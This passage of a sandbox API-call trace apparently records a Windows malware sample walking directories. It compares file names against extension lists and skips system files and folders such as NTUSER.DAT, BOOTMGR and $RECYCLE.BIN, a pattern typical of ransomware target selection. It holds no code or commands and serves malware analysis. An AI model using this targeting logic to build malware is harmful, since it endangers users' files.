dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="WIN32_LINKDROP32X32.GIF", cchCount2=23) returned 3 [0091.148] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="GIF", cchCount2=3) returned 1 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="WIN32_LINKNODROP32X32.GIF", cchCount2=25) returned 3 [0091.149] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="GIF", cchCount2=3) returned 1 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.149] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 1 [0091.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="WIN32_MOVEDROP32X32.GIF", cchCount2=23) returned 3 [0091.150] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="GIF", cchCount2=3) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="WIN32_MOVENODROP32X32.GIF", cchCount2=25) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="WIN32_MOVENODROP32X32.GIF", cchCount2=25) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="WIN32_MOVENODROP32X32.GIF", cchCount2=25) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="WIN32_MOVENODROP32X32.GIF", cchCount2=25) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="WIN32_MOVENODROP32X32.GIF", cchCount2=25) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="WIN32_MOVENODROP32X32.GIF", cchCount2=25) returned 1 [0091.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="WIN32_MOVENODROP32X32.GIF", cchCount2=25) returned 1 [0091.151] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 0 [0091.151] FindClose (in: hFindFile=0x2b7048 | out: hFindFile=0x2b7048) returned 1 [0091.152] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.152] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0091.152] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.152] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.152] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.152] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.152] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.178] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.178] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.178] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.255] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.255] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.255] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.255] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.255] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.255] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.255] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0091.256] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.256] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.256] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.256] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.256] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.256] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.256] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.256] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.256] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.256] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.372] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.372] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.372] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.372] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.427] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*", lpFindFileData=0x19f070 | out: lpFindFileData=0x19f070) returned 0x2b6f08 [0099.655] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x2350000 [0099.657] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0099.657] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.658] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0099.658] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.658] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0099.658] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.658] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0099.658] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.659] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0099.659] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.659] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0099.659] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.659] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0099.659] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.660] CharUpperBuffW (in: 